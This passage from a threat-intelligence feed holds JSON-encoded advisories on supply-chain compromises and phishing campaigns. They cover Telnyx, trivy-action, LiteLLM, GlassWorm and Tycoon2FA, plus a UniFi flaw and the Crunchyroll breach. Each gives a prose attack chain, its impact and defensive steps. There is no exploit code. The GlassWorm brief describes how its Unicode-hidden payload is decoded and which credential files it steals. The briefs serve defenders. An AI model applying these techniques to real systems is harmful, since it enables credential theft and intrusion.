variables.\u003c/li\u003e\n\u003cli\u003eIf Kubernetes is present, the malware enumerates cluster secrets and deploys privileged pods to access underlying host systems. On Windows, a different WAV file (\u003ccode\u003ehangup.wav\u003c/code\u003e) is downloaded that extracts and saves an executable named \u003ccode\u003emsbuild.exe\u003c/code\u003e to the startup folder for persistence.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack could result in widespread compromise of systems utilizing the Telnyx Python SDK. Over 740,000 monthly downloads indicate a large potential victim pool. Stolen credentials and secrets can lead to unauthorized access to cloud resources, sensitive data exfiltration, and further lateral movement within compromised networks. For systems running Kubernetes, the attacker could gain control over the entire cluster, leading to significant disruption and data loss. Developers who installed the malicious packages are advised to consider their systems fully compromised and rotate all secrets as soon as possible.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eIdentify and remove Telnyx versions 4.87.1 and 4.87.2 from all environments, reverting to version 4.87.0 as recommended by the vendor.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for processes spawned by Python interpreters (\u003ccode\u003epython.exe\u003c/code\u003e, \u003ccode\u003epython3\u003c/code\u003e) attempting to download files with the \u003ccode\u003e.wav\u003c/code\u003e extension, using the \u0026ldquo;Detect Suspicious Python WAV Download\u0026rdquo; Sigma rule provided below.\u003c/li\u003e\n\u003cli\u003eImplement stricter controls and multi-factor authentication for PyPI accounts used to publish packages to prevent similar supply chain attacks.\u003c/li\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Detect msbuild.exe in Startup Folder\u0026rdquo; Sigma rule to identify potential persistence attempts on Windows systems.\u003c/li\u003e\n\u003cli\u003eRotate all secrets and credentials on any system that has imported the malicious Telnyx package.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-28T12:00:00Z","date_published":"2026-03-28T12:00:00Z","id":"/briefs/2026-03-teampcp-telnyx/","summary":"The TeamPCP threat actor compromised the Telnyx PyPI package, injecting credential-stealing malware hidden within WAV audio files to target Linux, macOS, and Windows systems.","title":"TeamPCP Backdoors Telnyx PyPI Package with Steganographic Malware","url":"https://feed.craftedsignal.io/briefs/2026-03-teampcp-telnyx/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["phishing","credential-theft","MFA-bypass"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eTycoon2FA is a subscription-based PhaaS platform that enables cybercriminals to bypass multifactor authentication (MFA) and compromise email accounts using adversary-in-the-middle (AITM) techniques. The platform gained prominence in 2025, reportedly generating over 30 million malicious emails in a single month and accounting for 62% of all phishing attempts blocked by Microsoft at one point. On March 4, 2026, Europol announced a technical disruption of Tycoon2FA, seizing 330 domains forming the platform’s core infrastructure. Despite this takedown, CrowdStrike Falcon Complete observed a short-term decrease in Tycoon2FA activity followed by a return to pre-disruption levels. The persistence of the platform\u0026rsquo;s original tactics, techniques, and procedures (TTPs) suggests that the actors behind Tycoon2FA remain active and pose a continued threat. Defenders should maintain vigilance.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eVictims receive phishing emails designed to appear legitimate.\u003c/li\u003e\n\u003cli\u003eThese emails direct victims to Tycoon2FA CAPTCHA pages hosted on attacker-controlled domains.\u003c/li\u003e\n\u003cli\u003eUpon CAPTCHA validation, a JavaScript (JS) file extracts the victim\u0026rsquo;s email address.\u003c/li\u003e\n\u003cli\u003eThe victim is then redirected to a fake Microsoft 365 or Google login page hosted on a Tycoon2FA domain.\u003c/li\u003e\n\u003cli\u003eVictims enter their credentials, which are proxied to a legitimate Microsoft 365 cloud account via an obfuscated JS file.\u003c/li\u003e\n\u003cli\u003eThe attacker steals the victim\u0026rsquo;s session cookies and credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker authenticates to the victim\u0026rsquo;s cloud environment using the stolen cookies and credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker gains access to the victim\u0026rsquo;s email and other cloud-based resources, potentially leading to data exfiltration or further malicious activity.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eTycoon2FA\u0026rsquo;s operations began in 2023, and by mid-2025, it was responsible for 62% of all phishing attempts blocked by Microsoft, generating over 30 million malicious emails in a single month. A successful attack can lead to unauthorized access to sensitive data, business email compromise, financial loss, and reputational damage. The resurgence of Tycoon2FA following the takedown indicates the platform remains a significant threat, highlighting the need for robust defenses against phishing and credential theft.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor email traffic for unusual patterns and sender addresses to detect phishing attempts associated with Tycoon2FA (IOC: phishing emails).\u003c/li\u003e\n\u003cli\u003eImplement and tune web filtering rules to block access to known Tycoon2FA domains and newly registered domains that may be used for phishing campaigns (IOC: Tycoon2FA domain).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect JavaScript files that attempt to extract email addresses from web pages, a technique used by Tycoon2FA to target victims.\u003c/li\u003e\n\u003cli\u003eReview and reinforce MFA policies and educate users about the risks of phishing and credential theft.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-28T08:28:28Z","date_published":"2026-03-28T08:28:28Z","id":"/briefs/2026-03-tycoon2fa-resurgence/","summary":"The Tycoon2FA phishing-as-a-service (PhaaS) platform, disrupted in March 2026, has resurged with consistent tactics, employing adversary-in-the-middle (AITM) techniques to bypass MFA and compromise email accounts through phishing campaigns, credential theft, and session cookie hijacking.","title":"Tycoon2FA PhaaS Platform Resurgence After Takedown","url":"https://feed.craftedsignal.io/briefs/2026-03-tycoon2fa-resurgence/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["phishing","credential-theft","MFA-bypass","phishing-as-a-service"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 4, 2026, Europol announced a technical disruption of the Tycoon2FA Phishing-as-a-Service (PhaaS) platform, which enabled cybercriminals to bypass multifactor authentication (MFA) and compromise email accounts. The takedown involved seizing 330 domains that formed the platform’s core infrastructure. However, following the takedown, CrowdStrike observed only a short-term decrease in Tycoon2FA campaign activity. The volume of cloud compromises has since returned to pre-disruption levels, and the platform continues to employ previously observed TTPs. Tycoon2FA, active since 2023, was responsible for a significant portion of phishing attempts, purportedly generating over 30 million malicious emails in a single month in mid-2025. The platform primarily targets Microsoft 365 and Google accounts using adversary-in-the-middle (AITM) techniques.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eVictims receive phishing emails directing them to Tycoon2FA CAPTCHA pages.\u003c/li\u003e\n\u003cli\u003eUpon CAPTCHA validation, victims\u0026rsquo; session cookies are stolen.\u003c/li\u003e\n\u003cli\u003eA JavaScript (JS) file is used to extract victims’ email addresses.\u003c/li\u003e\n\u003cli\u003eVictims are redirected to fake Microsoft 365 or Google login pages hosted on a Tycoon2FA domain.\u003c/li\u003e\n\u003cli\u003eVictims enter their credentials into the fake login pages, which are then proxied to a legitimate Microsoft 365 cloud account via an obfuscated JS file.\u003c/li\u003e\n\u003cli\u003eThe threat actor authenticates to the victim’s cloud environment using the stolen cookies and credentials.\u003c/li\u003e\n\u003cli\u003eOnce authenticated, the attacker gains access to the victim\u0026rsquo;s email and other cloud resources.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform actions such as data exfiltration, sending phishing emails to other targets, or further compromising the organization\u0026rsquo;s environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe resurgence of Tycoon2FA demonstrates the resilience of PhaaS platforms and their operators. The platform was responsible for a large percentage of phishing attacks in 2025, including 62% of all phishing attempts blocked by Microsoft in mid-2025, and generating over 30 million malicious emails in a single month. Successful attacks can lead to unauthorized access to sensitive data, financial losses, and reputational damage. The observed return to pre-disruption activity levels indicates a sustained threat to organizations relying on MFA for account security.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Tycoon2FA Phishing Redirection\u0026rdquo; Sigma rule to detect potential phishing attempts redirecting to Tycoon2FA infrastructure.\u003c/li\u003e\n\u003cli\u003eMonitor email traffic for patterns indicative of phishing campaigns, focusing on emails directing users to external login pages, as described in the Attack Chain.\u003c/li\u003e\n\u003cli\u003eImplement strict session management policies and regularly review user authentication logs for suspicious activity following successful authentication as described in the attack chain, step 7.\u003c/li\u003e\n\u003cli\u003eBlock known Tycoon2FA domains at the DNS resolver, as referenced in the IOC section.\u003c/li\u003e\n\u003cli\u003eEducate users about the tactics used by Tycoon2FA, specifically the use of CAPTCHA pages to steal session cookies, as described in the Attack Chain, step 2.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-28T08:20:54Z","date_published":"2026-03-28T08:20:54Z","id":"/briefs/2026-04-tycoon2fa-resurgence/","summary":"The Tycoon2FA Phishing-as-a-Service platform, used to bypass multifactor authentication (MFA), has resurged to pre-takedown levels of activity following a disruption effort in March 2026, maintaining its original tactics, techniques, and procedures (TTPs) for credential harvesting and cloud compromise.","title":"Tycoon2FA Phishing-as-a-Service Resurgence After Takedown","url":"https://feed.craftedsignal.io/briefs/2026-04-tycoon2fa-resurgence/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","github-actions"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, a spike in script execution detections on Linux-based GitHub Actions runners led to the discovery of a supply chain compromise affecting the aquasecurity/trivy-action GitHub Action. The attackers retroactively poisoned 76 of the 77 release tags by repointing them to malicious commits. This manipulation replaced the legitimate entry point with a multi-stage credential stealer. The malicious code operates silently before the legitimate Trivy scanner logic is executed, which allows the malicious activity to remain hidden as workflows appear to complete normally. Aqua Security has confirmed the compromise and removed the malicious artifacts. This incident highlights the risks associated with trusting third-party actions in CI/CD pipelines and the potential for attackers to gain access to sensitive credentials and internal infrastructure.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer triggers a GitHub Actions workflow that utilizes the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe GitHub Actions runner downloads the specified version of the \u003ccode\u003etrivy-action\u003c/code\u003e from GitHub.\u003c/li\u003e\n\u003cli\u003eDue to tag repointing, the downloaded action contains malicious code in the \u003ccode\u003eentrypoint.sh\u003c/code\u003e script.\u003c/li\u003e\n\u003cli\u003eThe malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script executes a multi-stage credential theft operation.\u003c/li\u003e\n\u003cli\u003eThe script enumerates process IDs (PIDs) to discover runner processes.\u003c/li\u003e\n\u003cli\u003eAfter credential theft, the legitimate Trivy scanner logic is executed to maintain the appearance of normal operation.\u003c/li\u003e\n\u003cli\u003eStolen credentials and secrets are likely exfiltrated to a attacker controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to gain unauthorized access to internal infrastructure, cloud resources, or other sensitive systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the trivy-action GitHub Action could have resulted in widespread credential theft across numerous organizations using the affected versions. With 76 of 77 release tags poisoned, a vast majority of users were exposed. Successful credential theft can lead to unauthorized access to sensitive systems, data breaches, and potential supply chain attacks affecting downstream customers. The incident highlights the critical importance of supply chain security and the need for robust monitoring and detection mechanisms in CI/CD pipelines.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect your CI/CD pipelines for usage of the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub Action and verify the integrity of the action being used.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u003ccode\u003eDetect Suspicious Script Execution in GitHub Actions Runner\u003c/code\u003e to identify potentially malicious script execution within GitHub Actions runners.\u003c/li\u003e\n\u003cli\u003eMonitor process execution within GitHub Actions runners for unusual or unexpected activity that deviates from normal CI/CD operations (reference: Attack Chain step 5).\u003c/li\u003e\n\u003cli\u003eEnable detailed logging on GitHub Actions runners to capture process execution, network connections, and file system activity for forensic analysis and threat hunting.\u003c/li\u003e\n\u003cli\u003eImplement strong access controls and least privilege principles for GitHub Actions secrets and credentials to limit the impact of potential credential theft.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-28T08:12:22Z","date_published":"2026-03-28T08:12:22Z","id":"/briefs/2026-03-trivy-action-compromise/","summary":"The trivy-action GitHub Action was compromised via git tag repointing, with attackers poisoning 76 of 77 release tags to inject a multi-stage credential stealer before the legitimate scanner runs, granting attackers access to CI/CD pipeline secrets.","title":"Compromised trivy-action GitHub Action Enables Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-trivy-action-compromise/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["unifi","mitm","credential-theft","cve-2019-25652"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2019-25652 affects UniFi Network Controller versions prior to 5.10.22 and 5.11.x before 5.11.18. The vulnerability stems from an improper certificate verification process during SMTP connections. An attacker positioned on an adjacent network can exploit this weakness to conduct man-in-the-middle (MitM) attacks. By presenting a false SSL certificate, the attacker can intercept SMTP traffic intended for the UniFi Network Controller, potentially gaining access to sensitive information…\u003c/p\u003e\n","date_modified":"2026-03-27T22:16:19Z","date_published":"2026-03-27T22:16:19Z","id":"/briefs/2026-03-unifi-cert-bypass/","summary":"UniFi Network Controller versions before 5.10.22 and 5.11.x before 5.11.18 contain an improper certificate verification vulnerability, enabling adjacent network attackers to perform man-in-the-middle attacks by presenting a fraudulent SSL certificate during SMTP connections to intercept traffic and steal credentials.","title":"UniFi Network Controller Improper Certificate Verification Vulnerability (CVE-2019-25652)","url":"https://feed.craftedsignal.io/briefs/2026-03-unifi-cert-bypass/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","malware","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 25, 2026, two malicious versions of the \u003ccode\u003elitellm\u003c/code\u003e package (versions 1.82.7 and 1.82.8) were discovered on the PyPI repository. These versions were found to contain automatically activated malware. The malicious code was designed to harvest sensitive credentials and files from systems where the compromised packages were installed. This supply chain attack follows a previous API token exposure stemming from a compromised trivy dependency, indicating a potential escalation in targeting the \u003ccode\u003elitellm\u003c/code\u003e project. The compromised packages exfiltrate stolen data to a remote API controlled by the attacker.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker compromises the \u003ccode\u003elitellm\u003c/code\u003e PyPI package repository, likely leveraging exposed credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious code into versions 1.82.7 and 1.82.8 of the \u003ccode\u003elitellm\u003c/code\u003e package. The malicious code is automatically activated upon installation.\u003c/li\u003e\n\u003cli\u003eA user installs either \u003ccode\u003elitellm\u003c/code\u003e version 1.82.7 or 1.82.8 via \u003ccode\u003epip\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eUpon execution, the malicious code begins harvesting credentials and files accessible to the \u003ccode\u003elitellm\u003c/code\u003e environment. This may include API keys, tokens, and other sensitive information.\u003c/li\u003e\n\u003cli\u003eThe malware establishes a network connection to a remote API server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe harvested credentials and files are exfiltrated to the attacker\u0026rsquo;s remote API server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to services and data protected by the stolen credentials.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack directly impacts any user who installed the malicious \u003ccode\u003elitellm\u003c/code\u003e packages (versions 1.82.7 and 1.82.8). Successful credential harvesting allows attackers to pivot and compromise other systems and services accessible with the stolen credentials, potentially leading to data breaches, unauthorized access, and further lateral movement within victim environments. The number of affected users is currently unknown, but the popularity of \u003ccode\u003elitellm\u003c/code\u003e suggests a potentially wide impact.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately revoke and rotate any credentials accessible to environments where \u003ccode\u003elitellm\u003c/code\u003e versions 1.82.7 or 1.82.8 were installed (description).\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect installations of the affected \u003ccode\u003elitellm\u003c/code\u003e versions (Sigma rule).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for connections originating from \u003ccode\u003elitellm\u003c/code\u003e processes to external, untrusted APIs (network_connection).\u003c/li\u003e\n\u003cli\u003eImplement strong dependency management practices, including the use of software composition analysis tools, to identify and prevent the installation of malicious packages (overview).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-26T12:00:00Z","date_published":"2026-03-26T12:00:00Z","id":"/briefs/2026-03-litellm-supply-chain/","summary":"Compromised versions of the LiteLLM package (1.82.7 and 1.82.8) on PyPI contained malware designed to harvest sensitive credentials and files, exfiltrating them to a remote API, impacting users who installed and ran the package.","title":"Malicious LiteLLM Versions Harvest Credentials","url":"https://feed.craftedsignal.io/briefs/2026-03-litellm-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","llm","trivy"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 24, 2026, reports surfaced indicating that the LiteLLM package, a library designed to provide a unified interface for interacting with various large language models, was compromised and injected with malicious code. This compromise occurred through a vulnerability in Trivy, a widely-used open-source vulnerability scanner. The malicious code was designed to steal credentials, potentially including API keys and other sensitive information used to access and manage language models. The scope of the compromise is currently unknown, but given the popularity of both LiteLLM and Trivy, the potential impact could be significant across various sectors using LLMs. This incident highlights the risks associated with supply chain vulnerabilities and the importance of thorough security audits of third-party dependencies.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA vulnerability is exploited within Trivy, potentially during its build or update process.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages this vulnerability to inject malicious code into the LiteLLM package during its build or release process.\u003c/li\u003e\n\u003cli\u003eUsers download and install the compromised LiteLLM package from the official repository (e.g., PyPI).\u003c/li\u003e\n\u003cli\u003eUpon execution of the infected LiteLLM package, the malicious code is triggered.\u003c/li\u003e\n\u003cli\u003eThe malicious code collects credentials, such as API keys, environment variables, or configuration files, from the user\u0026rsquo;s system or environment.\u003c/li\u003e\n\u003cli\u003eThe stolen credentials are exfiltrated to a remote server controlled by the attacker using network protocols like HTTP/S.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to access and control the victim\u0026rsquo;s accounts, resources, and data related to language model services.\u003c/li\u003e\n\u003cli\u003eThe attacker may further exploit the compromised systems for lateral movement, data exfiltration, or other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful compromise of the LiteLLM package can lead to significant damage, including unauthorized access to language model APIs, data breaches, and financial losses. The number of affected users and organizations is currently unknown. Sectors relying heavily on LLMs, such as AI development, research, and various industries integrating AI-powered applications, are particularly vulnerable. If successful, the attack can result in the exposure of sensitive data, disruption of services, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement integrity checks on all downloaded packages to verify their authenticity and prevent the installation of compromised versions (reference: overview).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious outbound connections originating from processes associated with the LiteLLM package, looking for connections to unknown or malicious IPs (reference: Attack Chain, step 6).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to detect potential credential theft and exfiltration attempts (reference: rules).\u003c/li\u003e\n\u003cli\u003eImplement strict access controls and least privilege principles to limit the impact of compromised credentials (reference: Impact).\u003c/li\u003e\n\u003cli\u003eConduct regular security audits of all third-party dependencies and use software composition analysis tools to identify and remediate vulnerabilities (reference: Overview).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-25T12:00:00Z","date_published":"2026-03-25T12:00:00Z","id":"/briefs/2026-03-litellm-credential-theft/","summary":"The LiteLLM package was compromised and infected with credential-stealing code through a supply chain attack leveraging the Trivy vulnerability scanner.","title":"LiteLLM Package Compromised with Credential-Stealing Code via Trivy","url":"https://feed.craftedsignal.io/briefs/2026-03-litellm-credential-theft/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","unicode-encoding"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe GlassWorm campaign, active since October 2025, targets software supply chains through malicious code concealed using Unicode variation selectors. This technique renders the payload virtually invisible in standard editors and code review processes. The attackers rotate extension IDs, npm package names, wallet addresses, and C2 infrastructure across multiple waves. A decoder component extracts the hidden bytes and executes them via \u003ccode\u003eeval()\u003c/code\u003e or \u003ccode\u003eFunction()\u003c/code\u003e. The malware queries a Solana wallet to dynamically retrieve C2 URLs and proceeds to steal sensitive information, including \u003ccode\u003e.npmrc\u003c/code\u003e, \u003ccode\u003e.git-credentials\u003c/code\u003e, SSH keys (\u003ccode\u003eid_rsa\u003c/code\u003e, \u003ccode\u003eid_ed25519\u003c/code\u003e), and token environment variables such as \u003ccode\u003eNPM_TOKEN\u003c/code\u003e, \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e, and \u003ccode\u003eOPEN_VSX_TOKEN\u003c/code\u003e. Wave 5, observed in March, compromised over 150 GitHub repositories, 72 Open VSX extensions, and 4 npm packages. Defenders relying solely on IOC-based detections may struggle to keep pace with the rapid evolution of this threat.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eMalicious code is injected into a software supply chain component (VS Code extension, npm package, etc.).\u003c/li\u003e\n\u003cli\u003eThe payload is encoded using Unicode variation selectors, rendering it nearly invisible.\u003c/li\u003e\n\u003cli\u003eThe victim installs or incorporates the compromised component into their development environment.\u003c/li\u003e\n\u003cli\u003eA decoder routine within the payload utilizes \u003ccode\u003ecodePointAt()\u003c/code\u003e with arithmetic against \u003ccode\u003e0xFE00/0xE0100\u003c/code\u003e to reconstruct the original bytecode.\u003c/li\u003e\n\u003cli\u003eThe decoded bytecode is executed using \u003ccode\u003eeval()\u003c/code\u003e or \u003ccode\u003eFunction()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe executed code queries a Solana wallet using RPC methods (\u003ccode\u003egetTransaction\u003c/code\u003e, \u003ccode\u003egetSignaturesForAddress\u003c/code\u003e) to retrieve C2 URLs.\u003c/li\u003e\n\u003cli\u003eThe malware targets files such as \u003ccode\u003e.npmrc\u003c/code\u003e, \u003ccode\u003e.git-credentials\u003c/code\u003e, \u003ccode\u003eid_rsa\u003c/code\u003e, and \u003ccode\u003eid_ed25519\u003c/code\u003e for credential theft.\u003c/li\u003e\n\u003cli\u003eStolen credentials and token environment variables (\u003ccode\u003eNPM_TOKEN\u003c/code\u003e, \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e, \u003ccode\u003eOPEN_VSX_TOKEN\u003c/code\u003e) are exfiltrated to the C2 server.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe GlassWorm campaign has successfully compromised over 150 GitHub repositories, 72 Open VSX extensions, and 4 npm packages in Wave 5 alone. Successful attacks can lead to the theft of sensitive credentials, potentially granting attackers unauthorized access to code repositories, package management accounts, and other critical infrastructure. This, in turn, can enable further supply chain attacks or intellectual property theft.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement the Unicode payload detection rule to identify suspicious densities of Unicode variation selector clusters in source code (see \u0026ldquo;Unicode Payload Detection\u0026rdquo; rule below).\u003c/li\u003e\n\u003cli\u003eDeploy the decoder detection rule to flag code patterns that use \u003ccode\u003ecodePointAt()\u003c/code\u003e with specific arithmetic operations followed by \u003ccode\u003eeval()\u003c/code\u003e or \u003ccode\u003eFunction()\u003c/code\u003e calls (see \u0026ldquo;GlassWorm Decoder Detection\u0026rdquo; rule below).\u003c/li\u003e\n\u003cli\u003eMonitor for network connections originating from non-blockchain applications using Solana RPC methods (\u003ccode\u003egetTransaction\u003c/code\u003e, \u003ccode\u003egetSignaturesForAddress\u003c/code\u003e), as described in the overview, to identify potential C2 activity.\u003c/li\u003e\n\u003cli\u003eImplement access controls and monitoring for sensitive files like \u003ccode\u003e.npmrc\u003c/code\u003e, \u003ccode\u003e.git-credentials\u003c/code\u003e, and SSH keys as described in the overview.\u003c/li\u003e\n\u003cli\u003eUse the \u003ccode\u003eglassworm-hunter\u003c/code\u003e tool linked in the references section to scan VS Code extensions, node_modules, pip site-packages, and git repos.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T14:30:00Z","date_published":"2026-03-24T14:30:00Z","id":"/briefs/2026-03-glassworm-supply-chain/","summary":"The GlassWorm campaign employs Unicode variation selectors to conceal malicious code within supply chain artifacts, subsequently querying a Solana wallet for C2 URLs and exfiltrating sensitive credentials.","title":"GlassWorm Supply Chain Attack Using Unicode Encoding and Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-glassworm-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","data-breach","credential-theft","phishing"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 23, 2026, a data breach was reported at Crunchyroll, stemming from a compromise of their outsourcing partner, Telus, in India. The attackers successfully gained access to Crunchyroll\u0026rsquo;s environment after a Telus employee was targeted with a spoofed phishing email. This email delivered malware that stole the employee\u0026rsquo;s Okta credentials, granting the attacker a foothold into Crunchyroll\u0026rsquo;s systems. The breach resulted in the exfiltration of approximately 100 GB of sensitive customer analytics and ticketing data. The threat actor had unauthorized access for a duration of 24 hours before the compromised credentials were revoked. This incident highlights the risks associated with supply chain vulnerabilities and the importance of robust security measures across all partner organizations.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e A Telus employee received a spoofed phishing email containing malware. (T1566)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMalware Deployment:\u003c/strong\u003e The employee interacted with the phishing email, leading to the deployment of an infostealer on their machine.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Theft:\u003c/strong\u003e The malware captured the employee\u0026rsquo;s Okta credentials. (TA0006)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAuthentication:\u003c/strong\u003e The attacker used the stolen Okta credentials to authenticate into Crunchyroll\u0026rsquo;s environment.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Access:\u003c/strong\u003e Upon successful authentication, the attacker gained access to customer analytics and ticketing data.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Exfiltration:\u003c/strong\u003e The attacker exfiltrated approximately 100 GB of data, including PII such as email addresses and IP addresses. (TA0010)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement (Likely):\u003c/strong\u003e While not explicitly stated, the attacker likely performed some level of lateral movement within the Crunchyroll environment to access the data.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eObjective Achieved:\u003c/strong\u003e The attacker successfully exfiltrated sensitive customer data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe Crunchyroll data breach resulted in the exfiltration of 100 GB of customer analytics and ticketing data. This included personally identifiable information (PII) such as email addresses and IP addresses. The exposure of this data could lead to identity theft, phishing attacks targeting Crunchyroll customers, and potential financial fraud. The breach also damages Crunchyroll\u0026rsquo;s reputation and erodes customer trust. The incident underscores the critical need for robust security measures across the entire supply chain to protect sensitive customer data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement and enforce strict email security policies to prevent phishing attacks, focusing on employee training to recognize spoofed emails (T1566).\u003c/li\u003e\n\u003cli\u003eDeploy endpoint detection and response (EDR) solutions on all employee machines to detect and prevent malware deployment (TA0005).\u003c/li\u003e\n\u003cli\u003eMonitor Okta authentication logs for suspicious login activity, such as logins from unusual locations or at unusual times (TA0006).\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) for all user accounts, especially those with access to sensitive data, to mitigate the impact of credential 